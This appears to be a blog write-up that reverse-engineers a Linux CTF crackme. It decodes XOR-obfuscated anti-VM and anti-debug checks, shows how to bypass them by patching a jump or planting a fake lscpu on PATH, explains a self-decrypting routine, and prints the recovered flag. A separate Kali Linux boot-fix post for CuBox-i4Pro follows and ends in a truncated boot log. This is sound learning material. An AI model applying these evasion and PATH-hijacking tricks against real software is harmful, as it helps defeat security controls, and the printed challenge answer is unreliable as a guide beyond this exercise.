call    _waitpid
The waitpid() system call is used to wait for state changes in a child of the calling process, and obtain information about the child whose state has changed. A state change is considered to be: the child terminated; the child was stopped by a signal; or the child was resumed by a signal. In the case of a terminated child, performing a wait allows the system to release the resources associated with the child; if a wait is not performed, then the terminated child remains in a "zombie" state. (ref)
An extensive step by step reverse engineering analysis of a Linux CTF binary

On success, waitpid() returns the process ID of the child whose state has changed; On error, -1 is returned. In the next blocks 2, 3, 4 and 5 what happens is described in this answer I got on ReverseEngineering. There's no need to add anything more.

Anti-VM code

An extensive step by step reverse engineering analysis of a Linux CTF binary

This is where things become fun and interesting. We can observe a bunch of mov instructions into the stack, a loop and inside of it an interesting xor instruction: xor eax, 75h. It seems to be a loop that cycle 0x32 times (50in decimal) and starting from [ebp+command] it xors one byte at a time to a fixed value equal to \x75. Pretty standard XOR decryption routine, right? We can try to replicate this routine in python:

#!/usr/bin/python
 
hexdata = "19061605005509551207100555523D0C051007031C061A07525509550107555811555255525509551600015558114F55581347"
binary = hexdata.decode("hex")
 
def xor_strings(data):
    return "".join(chr(ord(data[i]) ^ 0x75) for i in range(len(data)))
 
xored = xor_strings(binary)
print "Your decrypted string is: " + xored
[email protected]:/opt/ctf# ./script.py 
Your decrypted string is: lscpu | grep 'Hypervisor' | tr -d ' ' | cut -d: -f2

Basically, it decrypts in memory a shell command and execute it via the next popen syscall that verifies, using the lscpu command, if the CPU name contains a string Hypervisor. This syscall looks pretty interesting:

The Β popen() function opens a process by creating a pipe, forking, and invoking the shell. Since a pipe is by definition unidirectional, the type argument may specify only reading or writing, not both; the resulting stream is correspondingly read-only or write-only. The command argument is a pointer to a null-terminated string containing a shell command line. Β This command is passed to /bin/sh using the -c flag; interpretation, if any, is performed by the shell. The type argument is a pointer to a null-terminated string which must contain either the letter 'r' for reading or the letter 'w' for writing. popen(): on success, returns a pointer to an open stream that can be used to read or write to the pipe; if the fork(2) or pipe(2) calls fail, or if the function cannot allocate memory, NULL is returned.

After the stream is opened, another syscall fgetc() is executed.

fgetc() reads the next character from stream and returns it as an Β  Β  Β  Β unsigned char cast to an int, or EOF on end of file or error.

What happens is simple: it opens a stream, in read-only mode, and executes the command 'lscpu | grep 'Hypervisor' | tr -d ' ' | cut -d: -f2' . If it returns something, so the grep returns something, we're in a virtual machine, prints the string: [-] No vm please ;) and exit. If the stream fails or it does not return anything, it closes the stream via the fclose() syscall and returns.

Everything becomes clear if we look now into the pseudo-code, with important variables renamed as their role.

int AntiDebugAntiVM()
{
  char command; // [esp+4h] [ebp-54h]
  char v2; // [esp+5h] [ebp-53h]
  char v3; // [esp+6h] [ebp-52h]
  char v4; // [esp+7h] [ebp-51h]
  char v5; // [esp+8h] [ebp-50h]
  char v6; // [esp+9h] [ebp-4Fh]
  char v7; // [esp+Ah] [ebp-4Eh]
  char v8; // [esp+Bh] [ebp-4Dh]
  char v9; // [esp+Ch] [ebp-4Ch]
  char v10; // [esp+Dh] [ebp-4Bh]
  char v11; // [esp+Eh] [ebp-4Ah]
  char v12; // [esp+Fh] [ebp-49h]
  char v13; // [esp+10h] [ebp-48h]
  char v14; // [esp+11h] [ebp-47h]
  char v15; // [esp+12h] [ebp-46h]
  char v16; // [esp+13h] [ebp-45h]
  char v17; // [esp+14h] [ebp-44h]
  char v18; // [esp+15h] [ebp-43h]
  char v19; // [esp+16h] [ebp-42h]
  char v20; // [esp+17h] [ebp-41h]
  char v21; // [esp+18h] [ebp-40h]
  char v22; // [esp+19h] [ebp-3Fh]
  char v23; // [esp+1Ah] [ebp-3Eh]
  char v24; // [esp+1Bh] [ebp-3Dh]
  char v25; // [esp+1Ch] [ebp-3Ch]
  char v26; // [esp+1Dh] [ebp-3Bh]
  char v27; // [esp+1Eh] [ebp-3Ah]
  char v28; // [esp+1Fh] [ebp-39h]
  char v29; // [esp+20h] [ebp-38h]
  char v30; // [esp+21h] [ebp-37h]
  char v31; // [esp+22h] [ebp-36h]
  char v32; // [esp+23h] [ebp-35h]
  char v33; // [esp+24h] [ebp-34h]
  char v34; // [esp+25h] [ebp-33h]
  char v35; // [esp+26h] [ebp-32h]
  char v36; // [esp+27h] [ebp-31h]
  char v37; // [esp+28h] [ebp-30h]
  char v38; // [esp+29h] [ebp-2Fh]
  char v39; // [esp+2Ah] [ebp-2Eh]
  char v40; // [esp+2Bh] [ebp-2Dh]
  char v41; // [esp+2Ch] [ebp-2Ch]
  char v42; // [esp+2Dh] [ebp-2Bh]
  char v43; // [esp+2Eh] [ebp-2Ah]
  char v44; // [esp+2Fh] [ebp-29h]
  char v45; // [esp+30h] [ebp-28h]
  char v46; // [esp+31h] [ebp-27h]
  char v47; // [esp+32h] [ebp-26h]
  char v48; // [esp+33h] [ebp-25h]
  char v49; // [esp+34h] [ebp-24h]
  char v50; // [esp+35h] [ebp-23h]
  char v51; // [esp+36h] [ebp-22h]
  char v52; // [esp+37h] [ebp-21h]
  int stat_loc; // [esp+38h] [ebp-20h]
  __pid_t ParentPID; // [esp+3Ch] [ebp-1Ch]
  FILE *stream; // [esp+40h] [ebp-18h]
  __pid_t ChangedStateChildPID; // [esp+44h] [ebp-14h]
  __pid_t ChildPID; // [esp+48h] [ebp-10h]
  unsigned int i; // [esp+4Ch] [ebp-Ch]

  ChildPID = fork();
  if ( !ChildPID )
  {
    ParentPID = getppid();
    if ( ptrace(PTRACE_ATTACH, ParentPID, 0, 0) )
    {
      stat_loc = 1;
      exit(1);
    }
    sleep(5u);
    ptrace(PTRACE_DETACH, ParentPID, 0, 0);
    exit(0);
  }
  if ( ChildPID == -1 )
    exit(1);
  do
    ChangedStateChildPID = waitpid(ChildPID, &stat_loc, 0);
  while ( ChangedStateChildPID == -1 && *__errno_location() == 4 );
  if ( BYTE1(stat_loc) )
  {
    printf("[-] You fool, nobody debugs me!!!\n%d\n", BYTE1(stat_loc));
    exit(-1);
  }
  command = 0x19;
  v2 = 6;
  v3 = 0x16;
  v4 = 5;
  v5 = 0;
  v6 = 0x55;
  v7 = 9;
  v8 = 0x55;
  v9 = 0x12;
  v10 = 7;
  v11 = 0x10;
  v12 = 5;
  v13 = 0x55;
  v14 = 0x52;
  v15 = 0x3D;
  v16 = 0xC;
  v17 = 5;
  v18 = 0x10;
  v19 = 7;
  v20 = 3;
  v21 = 0x1C;
  v22 = 6;
  v23 = 0x1A;
  v24 = 7;
  v25 = 0x52;
  v26 = 0x55;
  v27 = 9;
  v28 = 0x55;
  v29 = 1;
  v30 = 7;
  v31 = 0x55;
  v32 = 0x58;
  v33 = 0x11;
  v34 = 0x55;
  v35 = 0x52;
  v36 = 0x55;
  v37 = 0x52;
  v38 = 0x55;
  v39 = 9;
  v40 = 0x55;
  v41 = 0x16;
  v42 = 0;
  v43 = 1;
  v44 = 0x55;
  v45 = 0x58;
  v46 = 0x11;
  v47 = 0x4F;
  v48 = 0x55;
  v49 = 0x58;
  v50 = 0x13;
  v51 = 0x47;
  v52 = 0;
  for ( i = 0; i <= 50; ++i )
    *(&command + i) ^= 0x75u;
  stream = popen(&command, "r");
  if ( stream && fgetc(stream) != -1 )
  {
    puts("[-] No vm please ;)");
    exit(-1);
  }
  return fclose(stream);
}

First round of conclusions

Right now it may seem pretty easy, but for me at that time, this was impossible to understand and represented the first big fail: I was not prepared with interpreting assembly XOR instruction, decryption loops and Linux syscalls. I spent almost an entire weekend on this and failed so hard. Because of the time constraints of the job selection, I sent my results without this last exercise and maybe this influenced my performance into the selection. How to bypass all these checks? We need to find from where this function is called and maybe we could modify the code flow to avoid this calling.

Jumping away

With the IDA basic functionalities, we can find where this function is called and, luckily for us, it's called from a single location:

An extensive step by step reverse engineering analysis of a Linux CTF binary

The instruction that calls the function is located inside this sub_E00 and, in particular, IDA shows that's the instruction: call ds:(off_2EF0-3000h) [ebx+edi*4]. Looking around this code we can patch the jz short loc_E55 into a jmp, so we would be able to circumvent all of the above protections.

Cheating with the shell

If you don't want to patch the binary, there's another way to fool this VM check, but not the anti-debug. If you notice, the command passed as an argument to the popen syscall is a normal shell command but with a relative path. So quick and dirty trick would be to create a fake lscpu like this:

#!/bin/bash
echo "I will run you anyway in this VM"

Be sure to export the directory inside the PATH variable and, basically, you're done: when the binary will try to execute the lscpu command, it will run the fake one, it won't return anything containing Hypervisor string, the grep would return nothing and the fgetc consequently will read nothing. Basically, all checks are positive. Easy as it seems.

Analyzing the self decrypting and injecting routine

We can take advantages of the debugging capabilities of IDA and playing with breakpoints. Single stepping into the program flow, after the above routines, we land into this interesting piece of code: Β 

An extensive step by step reverse engineering analysis of a Linux CTF binary

I spent a lot of days trying to understand this routine: but it was worth it because I learned a lot: I learned about linux syscalls like mprotect, calloc and also memcpy. I learned about how the code could auto-decrypt and auto-inject inside the binary itself. Moreover, how can be possible to change memory protections back and forth. Indeed, it was very helpful to look around this code, side by side, with its decompiled version:

int sub_CB5()
{
  char v0; // si
  size_t v1; // eax
  char s; // [esp+8h] [ebp-30h]
  char v4; // [esp+9h] [ebp-2Fh]
  char v5; // [esp+Ah] [ebp-2Eh]
  char v6; // [esp+Bh] [ebp-2Dh]
  char v7; // [esp+Ch] [ebp-2Ch]
  char v8; // [esp+Dh] [ebp-2Bh]
  char v9; // [esp+Eh] [ebp-2Ah]
  char v10; // [esp+Fh] [ebp-29h]
  char v11; // [esp+10h] [ebp-28h]
  char v12; // [esp+11h] [ebp-27h]
  char v13; // [esp+12h] [ebp-26h]
  char v14; // [esp+13h] [ebp-25h]
  char v15; // [esp+14h] [ebp-24h]
  char v16; // [esp+15h] [ebp-23h]
  char v17; // [esp+16h] [ebp-22h]
  char v18; // [esp+17h] [ebp-21h]
  char v19; // [esp+18h] [ebp-20h]
  char v20; // [esp+19h] [ebp-1Fh]
  char v21; // [esp+1Ah] [ebp-1Eh]
  char v22; // [esp+1Bh] [ebp-1Dh]
  void *src; // [esp+1Ch] [ebp-1Ch]
  _BYTE *v24; // [esp+20h] [ebp-18h]
  void *addr; // [esp+24h] [ebp-14h]
  size_t n; // [esp+28h] [ebp-10h]
  size_t i; // [esp+2Ch] [ebp-Ch]

  n = 320;
  addr = 0;
  v24 = &unk_E78;
  mprotect(0, (size_t)((char *)&unk_E78 - 0xFFFFD000 - 12288), 6);
  s = 0xF9u;
  v4 = 0xFCu;
  v5 = 0xFFu;
  v6 = 0xE6u;
  v7 = 0xF5u;
  v8 = 0xE0u;
  v9 = 0xF1u;
  v10 = 0xF3u;
  v11 = 0xFBu;
  v12 = 0xF9u;
  v13 = 0xFEu;
  v14 = 0xF7u;
  v15 = 0xFDu;
  v16 = 0xE9u;
  v17 = 0xF3u;
  v18 = 0xFFu;
  v19 = 0xF4u;
  v20 = 0xF5u;
  v21 = 0;
  src = calloc(0x141u, 1u);
  for ( i = 0; i < n; ++i )
  {
    v22 = *((_BYTE *)sub_89B + i);
    v0 = v22 ^ 0x90;
    v1 = strlen(&s);
    *((_BYTE *)src + i) = *(&s + i % v1) ^ v0;
  }
  memcpy(sub_89B, src, n);
  return mprotect(addr, v24 - (_BYTE *)addr, 4);
}

TL;DR

Before we go deep into the details of the single blocks of code, giving a general overview of what its final purpose is, may help its comprehension. First thing, the code changes via mprotect function the memory protections, adding the write permission, of a specific part of its .text section. After that, it copies, into the stack, some bytes that will be revealed as a key for an afterward decryption. Before entering into the main loop, it allocates an array of bytes into the heap via calloc. Specifically, the length of the array is 0x140 bytes; this value is saved into a local variable placed into the stack at [ebp+n] offset. The main loop is somehow complicated because it xors byte per byte some of its code, placed at sub_89B+i offset, with a fixed constant 0x90 and after, it xors it again with the aforementioned key on the stack. After that, it overwrites the code placed at sub_89B offset, with these new values via the memcpy call and returns after changing again the memory protections of that code section back to read-execute. Let's break in line by line, considering only the useful ones.

An extensive step by step reverse engineering analysis of a Linux CTF binary

Here, it setups the length of the future array in the variable placed on the stack at [ebp+n] with the size of 0x140 or 320 elements of 1 byte. After that, it prepares the arguments of the next call to mprotect, that will change the protection, enabling write permission, on the the address 0x5657D000. Looking up the stack:

An extensive step by step reverse engineering analysis of a Linux CTF binary

Having ESP pointing at 0xFFC344F0, the calling convention dictate that the arguments of a function must be pushed into the stack in reverse order. The mprotect call is defined as: int mprotect(void *addr, size_t len, int prot); with

  • prot = 6
  • len = 0xE78
  • *addr = 0x5657D000

In other words: change the permission of the memory area of 3704 bytes starting from address 0x5657D000, granting the writability via the PROT_WRITE constant. More info of this syscall here. But what's inside this address? We're inside the ELF header, basically the start of the entire binary.

An extensive step by step reverse engineering analysis of a Linux CTF binary

Going further, we can see the moving into the stack of some bytes, a call to calloc to allocate an array of 320+1 null bytes into the heap and the setup of a loop counter variable, placed at [ebp+var_C], with the same size of the array. We're setting up a loop that will scan, byte per byte, a specific area of the binary located at 0x5657D89B - that is a fixed value - and xor every byte, first with 0x90 and after with those bytes that were moved into the stack. For better understand this loop, I suggest to read the answer I got here. When this decryption loop ends, we have the decrypted code inside the heap, into the allocated array. Code can now be replaced with the decrypted one via the memcpy syscall. Finally, write permission can now be disabled and the routine can finish and return.

Second round of conclusions

Many days and months passed staring at me failing so hard into the understanding of this routine. But the feeling was still the same: I wanted to have that "[+] Good job! ;)" string and I've always had the Try Harder approach. Understanding this loop wasn't easy, not even close. I asked for help and, luckily, I got plenty. This is what I got: don't be afraid to ask for help but don't blindly ask for a solution. Work on that, demonstrate that you studied that thing and failed; People, eventually, will get that and will help you.

Towards the victory

After executing the decryption function we land into the code below. First it verifies that the user submitted a password of the length of exactly 0x27, that is a fixed value coming from this instruction: mov eax, (dword_56561058 - 56561000h) [ebx].

An extensive step by step reverse engineering analysis of a Linux CTF binary

Only if the password is exactly 39 characters, it moves on into the DecryptedFunction, passing the user's password as the argument. The previous experience helped a lot to understand this function and the pseudo code generated by IDA is pretty nice.

An extensive step by step reverse engineering analysis of a Linux CTF binary
int __cdecl DecryptedFunction(int UserSubmittedPassword)
{
  int result; // eax
  char v2; // [esp+0h] [ebp-38h]
  char v3; // [esp+1h] [ebp-37h]
  char v4; // [esp+2h] [ebp-36h]
  char v5; // [esp+3h] [ebp-35h]
  char v6; // [esp+4h] [ebp-34h]
  char v7; // [esp+5h] [ebp-33h]
  char v8; // [esp+6h] [ebp-32h]
  char v9; // [esp+7h] [ebp-31h]
  char v10; // [esp+8h] [ebp-30h]
  char v11; // [esp+9h] [ebp-2Fh]
  char v12; // [esp+Ah] [ebp-2Eh]
  char v13; // [esp+Bh] [ebp-2Dh]
  char v14; // [esp+Ch] [ebp-2Ch]
  char v15; // [esp+Dh] [ebp-2Bh]
  char v16; // [esp+Eh] [ebp-2Ah]
  char v17; // [esp+Fh] [ebp-29h]
  char v18; // [esp+10h] [ebp-28h]
  char v19; // [esp+11h] [ebp-27h]
  char v20; // [esp+12h] [ebp-26h]
  char v21; // [esp+13h] [ebp-25h]
  char v22; // [esp+14h] [ebp-24h]
  char v23; // [esp+15h] [ebp-23h]
  char v24; // [esp+16h] [ebp-22h]
  char v25; // [esp+17h] [ebp-21h]
  char v26; // [esp+18h] [ebp-20h]
  char v27; // [esp+19h] [ebp-1Fh]
  char v28; // [esp+1Ah] [ebp-1Eh]
  char v29; // [esp+1Bh] [ebp-1Dh]
  char v30; // [esp+1Ch] [ebp-1Ch]
  char v31; // [esp+1Dh] [ebp-1Bh]
  char v32; // [esp+1Eh] [ebp-1Ah]
  char v33; // [esp+1Fh] [ebp-19h]
  char v34; // [esp+20h] [ebp-18h]
  char v35; // [esp+21h] [ebp-17h]
  char v36; // [esp+22h] [ebp-16h]
  char v37; // [esp+23h] [ebp-15h]
  char v38; // [esp+24h] [ebp-14h]
  char v39; // [esp+25h] [ebp-13h]
  char v40; // [esp+26h] [ebp-12h]
  unsigned __int8 v41; // [esp+27h] [ebp-11h]
  int counter; // [esp+28h] [ebp-10h]
  int v43; // [esp+2Ch] [ebp-Ch]

  v43 = 0;
  v2 = 0x93u;
  v3 = 0x5E;
  v4 = 0xB0u;
  v5 = 0xB8u;
  v6 = 0xC5u;
  v7 = 0xD7u;
  v8 = 0xACu;
  v9 = 0x23;
  v10 = 0xC3u;
  v11 = 0xF0u;
  v12 = 6;
  v13 = 0x72;
  v14 = 0xF4u;
  v15 = 0x74;
  v16 = 0x93u;
  v17 = 0x52;
  v18 = 0x74;
  v19 = 0x72;
  v20 = 0x30;
  v21 = 0xEDu;
  v22 = 0x8Bu;
  v23 = 0x3D;
  v24 = 4;
  v25 = 0x58;
  v26 = 0xD8u;
  v27 = 0xE5u;
  v28 = 0xA2u;
  v29 = 0xCFu;
  v30 = 0x8Au;
  v31 = 0xEDu;
  v32 = 0x8Bu;
  v33 = 0x5C;
  v34 = 0x5E;
  v35 = 0x61;
  v36 = 0xDCu;
  v37 = 0x31;
  v38 = 0xCFu;
  v39 = 0x91u;
  v40 = 0x82u;
  for ( counter = 0; counter < PasswordLength; ++counter )
  {
    v41 = *((_BYTE *)AntiAnalysisFunction + counter + 0xC7);
    if ( (v41 ^ *(_BYTE *)(counter + UserSubmittedPassword)) != *(&v2 + counter) )
    {
      v43 = 1;
      break;
    }
  }
  if ( v43 )
    result = puts("[-] Nope!");
  else
    result = puts("[+] Good job! ;)");
  return result;
}

It scans the user's password, character by character, xoring it with a string retrieved from the binary itself. If every character matches it goes on and continue in the loop, otherwise it breaks. In the end, if everything is correct, it prints the beloved success string. How can we retrieve the correct flag? If we dump the 39 bytes from the binary, from the correct addresses, and xor them with the hardcoded string, we can take advantage of the xor bidirectional nature. Although you can find more details here, we're basically telling this:

A xor B = C
A xor C = B
B xor C = A

My first approach was to bruteforce the routine: if the string submitted is, eventually, \x41\x41\x41\x41\x41\x41\x41... we can step by step into the code and go into the final cmp instruction, retrieve the byte that it compares to and change the ZERO flag to force the loop to continue and not to stop. Otherwise we can dump the contents of the memory and xor with the hardcoded string, as result we get the flag that needs to be submitted to the binary.

We know that we need to get 39 bytes from address *((_BYTE *)AntiAnalysisFunction + 0 + 0xC7) to *((_BYTE *)AntiAnalysisFunction + 0x27 + 0xC7). Or from Β (0x5662A9DC + 0 + 0xC7) = 0x5662AAA3 to 0x5662AACA = (0x5662A9DC + 0x27 + 0xC7). We can apply the xor operation with the known string and we're able retrieve the flag, finally.

Hardcoded: 93 5E B0 B8 C5 D7 AC 23 C3 F0 06 72 F4 74 93 52 74 72 30 ED 8B 3D 04 58 D8 E5 A2 CF 8A ED 8B 5C 5E 61 DC 31 CF 91 82 
             
Memory dump: E8 18 FC FF FF 83 C4 10 85 C0 74 11 C7 45 E0 01 00 00 00 83 EC 0C 6A 01 E8 90 FB FF FF 83 EC 0C 6A 05 E8 46 FB FF FF

Flag hex: 7B 46 4C 47 3A 54 68 33 46 30 72 63 33 31 73 53 74 72 30 6E 67 31 6E 59 30 75 59 30 75 6E 67 50 34 64 34 77 34 6E 7D
Flag ascii:  {  F  L  G  :  T  h  3  F  0  r  c  3  1  s  S  t  r  0  n  g  1  n  Y  0  u  Y  0  u  n  g  P  4  d  4  w  4  n  }
An extensive step by step reverse engineering analysis of a Linux CTF binary

Conclusions

This was a long journey that required a lot of effort and countless sleepless nights. It was worth it? Every single minute, without any doubt. I hope this post will help you in your studies and if you spot any errors or want to help me in my journey into the reverse engineering world please leave a comment, tweet or e-mail.

As always, Try Harder.

How to fix and boot Kali Linux on the SolidRun CuBox-i4Pro

12 February 2019 at 09:45
By: Kartone
How to fix and boot Kali Linux on the SolidRun CuBox-i4Pro

If you tried to burn and run the Kali image that can be downloaded from the Offensive Security website, probably you ended up in a non bootable image.

U-Boot SPL 2018.05+dfsg-1 (May 10 2018 - 20:24:57 +0000)
Trying to boot from MMC1


U-Boot 2018.05+dfsg-1 (May 10 2018 - 20:24:57 +0000)

CPU:   Freescale i.MX6Q rev1.2 996 MHz (running at 792 MHz)
CPU:   Extended Commercial temperature grade (-20C to 105C) at 19C
Reset cause: POR
Board: MX6 Cubox-i
DRAM:  2 GiB
MMC:   FSL_SDHC: 0
Loading Environment from MMC... *** Warning - bad CRC, using default environment

Failed (-5)
No panel detected: default to HDMI
Display: HDMI (1024x768)
In:    serial
Out:   serial
Err:   serial
Net:   FEC
Hit any key to stop autoboot:  0
switch to partitions #0, OK
mmc0 is current device
Scanning mmc 0:1...
AHCI 0001.0300 32 slots 1 ports 3 Gbps 0x1 impl SATA mode
flags: ncq stag pm led clo only pmp pio slum part
No port device detected!

Device 0: Model:  Firm:  Ser#:
            Type: Hard Disk
            Capacity: not available
... is now current device
timeout exit!
timeout exit!
timeout exit!
timeout exit!
timeout exit!
timeout exit!

This is how you can fix it.

First thing, go here and download the image. Burn it into a nice fast SDCard as you can read in the tutorial. In my own system, SDCard is located at /dev/sdb, adjust accordingly to your settings.

xzcat kali-linux-2018.4-cuboxi.img.xz | dd of=/dev/sdb bs=512k

Now mount the image wherever you like and chroot into it. You'll should be able to browse it:

[email protected]:/# ll
total 84K
drwxr-xr-x  18 root root 4,0K feb 11 11:50 .
drwxr-xr-x  18 root root 4,0K feb 11 11:50 ..
lrwxrwxrwx   1 root root    7 ott 17 19:08 bin -> usr/bin
drwxr-xr-x   3 root root 4,0K feb 11 11:56 boot
drwxr-xr-x   4 root root 4,0K ott 17 19:08 dev
drwxr-xr-x 109 root root 4,0K feb 11 18:04 etc
drwxr-xr-x   2 root root 4,0K set 12 08:36 home
lrwxrwxrwx   1 root root   34 feb 11 11:50 initrd.img -> boot/initrd.img-4.19.0-kali1-armmp
lrwxrwxrwx   1 root root   34 ott 17 19:24 initrd.img.old -> boot/initrd.img-4.18.0-kali2-armmp
lrwxrwxrwx   1 root root    7 ott 17 19:08 lib -> usr/lib
drwx------   2 root root  16K ott 17 19:39 lost+found
drwxr-xr-x   2 root root 4,0K ott 17 19:08 media
drwxr-xr-x   2 root root 4,0K ott 17 19:08 mnt
drwxr-xr-x   4 root root 4,0K feb 11 12:23 opt
drwxr-xr-x   2 root root 4,0K set 12 08:36 proc
drwx------   9 root root 4,0K feb 11 17:43 root
drwxr-xr-x   2 root root 4,0K set 12 08:36 run
lrwxrwxrwx   1 root root    8 ott 17 19:08 sbin -> usr/sbin
drwxr-xr-x   2 root root 4,0K ott 17 19:08 srv
drwxr-xr-x   2 root root 4,0K set 12 08:36 sys
drwxrwxrwt  10 root root 4,0K feb 11 19:42 tmp
drwxr-xr-x  10 root root 4,0K ott 17 19:08 usr
drwxr-xr-x  12 root root 4,0K ott 17 19:23 var
lrwxrwxrwx   1 root root   31 feb 11 11:50 vmlinuz -> boot/vmlinuz-4.19.0-kali1-armmp
lrwxrwxrwx   1 root root   31 ott 17 19:24 vmlinuz.old -> boot/vmlinuz-4.18.0-kali2-armmp
[email protected]:/# 

Go into the /boot directory, create a symlink named dtbs that point to /usr/lib/linux-image-$(uname -r), in my case I'm with the 4.19.0 kernel version. Verify in you're own Kali version.

Also, create the extlinux directory and, inside of it, create a file named extlinux.conf. So, right now, you should be in this scenario.

[email protected]:/boot# ll
total 53M
drwxr-xr-x  3 root root 4,0K feb 11 11:56 .
drwxr-xr-x 18 root root 4,0K feb 11 11:50 ..
-rw-r--r--  1 root root 203K ott  9 14:47 config-4.18.0-kali2-armmp
-rw-r--r--  1 root root 205K gen  3 08:34 config-4.19.0-kali1-armmp
lrwxrwxrwx  1 root root   40 feb 11 11:56 dtbs -> /usr/lib/linux-image-4.19.0-kali1-armmp/
drwxr-xr-x  2 root root 4,0K feb 11 11:55 extlinux
-rw-r--r--  1 root root  19M ott 17 19:38 initrd.img-4.18.0-kali2-armmp
-rw-r--r--  1 root root  20M feb 11 11:52 initrd.img-4.19.0-kali1-armmp
-rw-r--r--  1 root root 3,0M ott  9 14:47 System.map-4.18.0-kali2-armmp
-rw-r--r--  1 root root 3,0M gen  3 08:34 System.map-4.19.0-kali1-armmp
-rw-r--r--  1 root root 4,0M ott  9 14:47 vmlinuz-4.18.0-kali2-armmp
-rw-r--r--  1 root root 4,1M gen  3 08:34 vmlinuz-4.19.0-kali1-armmp
[email protected]:/boot# ll ./extlinux/
total 12K
drwxr-xr-x 2 root root 4,0K feb 11 11:55 .
drwxr-xr-x 3 root root 4,0K feb 11 11:56 ..
-rw-r--r-- 1 root root  267 feb 11 11:55 extlinux.conf
[email protected]:/boot# 

Now edit extlinux.conf accordingly with these settings:

[email protected]:~# cat /boot/extlinux/extlinux.conf 
PROMPT 5
TIMEOUT 50
DEFAULT Kali

LABEL Kali
KERNEL /vmlinuz
FDTDIR /boot/dtbs/
INITRD /initrd.img
APPEND root=/dev/mmcblk1p1 rootfstype=ext4 video=mxcfb0:dev=hdmi,[email protected],if=RGB24,bpp=32 console=ttymxc0,115200n8 console=tty1 consoleblank=0 rw rootwait

Note that, starting from Kernel 4.9, the partition naming convention changed, first device is mmcblk1 and not mmcblk0. As the downloaded Kali image has only one partition, you need to use /dev/mmcblk1p1 device.

fdisk -l /dev/sdb
Disk /dev/sdb: 14,9 GiB, 15931539456 bytes, 31116288 sectors
Disk model: SD Card Reader  
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x38f6e81f

Device     Boot Start      End  Sectors  Size Id Type
/dev/sdb1        2048 31115263 31113216 14,9G 83 Linux

That's all. Now U-Boot should be fixed and able to boot your kernel.

U-Boot SPL 2018.05+dfsg-1 (May 10 2018 - 20:24:57 +0000)
Trying to boot from MMC1


U-Boot 2018.05+dfsg-1 (May 10 2018 - 20:24:57 +0000)

CPU:   Freescale i.MX6Q rev1.2 996 MHz (running at 792 MHz)
CPU:   Extended Commercial temperature grade (-20C to 105C) at 19C
Reset cause: POR
Board: MX6 Cubox-i
DRAM:  2 GiB
MMC:   FSL_SDHC: 0
Loading Environment from MMC... *** Warning - bad CRC, using default environment

Failed (-5)
No panel detected: default to HDMI
Display: HDMI (1024x768)
In:    serial
Out:   serial
Err:   serial
Net:   FEC
Hit any key to stop autoboot:  0 
switch to partitions #0, OK
mmc0 is current device
Scanning mmc 0:1...
Found /boot/extlinux/extlinux.conf
Retrieving file: /boot/extlinux/extlinux.conf
267 bytes read in 114 ms (2 KiB/s)
1:	Kali
Retrieving file: /boot/extlinux/../../initrd.img
20026342 bytes read in 1220 ms (15.7 MiB/s)
Retrieving file: /boot/extlinux/../../vmlinuz
4203008 bytes read in 479 ms (8.4 MiB/s)
append: root=/dev/mmcblk1p1 rootfstype=ext4 video=mxcfb0:dev=hdmi,[email protected],if=RGB24,bpp=32 console=ttymxc0,115200n8 console=tty1 consoleblank=0 rw rootwait
Retrieving file: /boot/extlinux/../dtbs/imx6q-cubox-i.dtb
36853 bytes read in 2755 ms (12.7 KiB/s)
## Flattened Device Tree blob at 18000000
   Booting using the fdt blob at 0x18000000
   Using Device Tree in place at 18000000, end 1800bff4

Starting kernel ...

[    0.000000] Booting Linux on physical CPU 0x0
[    0.000000] Linux version 4.19.0-kali1-armmp ([email protected]) (gcc version 8.2.0 (Debian 8.2.0-13)) #1 SMP Debian 4.19.13-1kali1 (2019-01-03)
[    0.000000] CPU: ARMv7 Processor [412fc09a] revision 10 (ARMv7), cr=10c5387d
[    0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
[    0.000000] OF: fdt: Machine model: SolidRun Cubox-i Dual/Quad
[    0.000000] Memory policy: Data cache writealloc
[    0.000000] efi: Getting EFI parameters from FDT:
[    0.000000] efi: UEFI not found.
[    0.000000] cma: Reserved 16 MiB at 0x8f000000
[    0.000000] random: get_random_bytes called from start_kernel+0xa0/0x504 with crng_init=0
[    0.000000] percpu: Embedded 17 pages/cpu @(ptrval) s39116 r8192 d22324 u69632
[    0.000000] Built 1 zonelists, mobility grouping on.  Total pages: 522560
[    0.000000] Kernel command line: root=/dev/mmcblk1p1 rootfstype=ext4 video=mxcfb0:dev=hdmi,[email protected],if=RGB24,bpp=32 console=ttymxc0,115200n8 console=tty1 consoleblank=0 rw rootwait
[    0.000000] Dentry cache hash table entries: 131072 (order: 7, 524288 bytes)
[    0.000000] Inode-cache hash table entries: 65536 (order: 6, 262144 bytes)
[    0.000000] Memory: 2025800K/2097152K available (8192K kernel code, 1107K rwdata, 2552K rodata, 2048K init, 306K bss, 54968K reserved, 16384K cma-reserved, 1294336K highmem)
[    0.000000] Virtual kernel memory layout:
[    0.000000]     vector  : 0xffff0000 - 0xffff1000   (   4 kB)
[    0.000000]     fixmap  : 0xffc00000 - 0xfff00000   (3072 kB)
[    0.000000]     vmalloc : 0xf0800000 - 0xff800000   ( 240 MB)
[    0.000000]     lowmem  : 0xc0000000 - 0xf0000000   ( 768 MB)
[    0.000000]     pkmap   : 0xbfe00000 - 0xc0000000   (   2 MB)
[    0.000000]     modules : 0xbf000000 - 0xbfe00000   (  14 MB)
[    0.000000]       .text : 0x(ptrval) - 0x(ptrval)   (9184 kB)
[    0.000000]       .init : 0x(ptrval) - 0x(ptrval)   (2048 kB)
[    0.000000]       .data : 0x(ptrval) - 0x(ptrval)   (1108 kB)
[    0.000000]        .bss : 0x(ptrval) - 0x(ptrval)   ( 307 kB)
[    0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
[    0.000000] ftrace: allocating 32449 entries in 96 pages
[    0.000000] rcu: Hierarchical RCU implementation.
[    0.000000] rcu: 	RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=4.
[    0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=4
[    0.000000] NR_IRQS: 16, nr_irqs: 16, preallocated irqs: 16
[    0.000000] L2C-310 errata 752271 769419 enabled
[    0.000000] L2C-310 enabling early BRESP for Cortex-A9
[    0.000000] L2C-310 full line of zeros enabled for Cortex-A9
[    0.000000] L2C-310 ID prefetch enabled, offset 16 lines
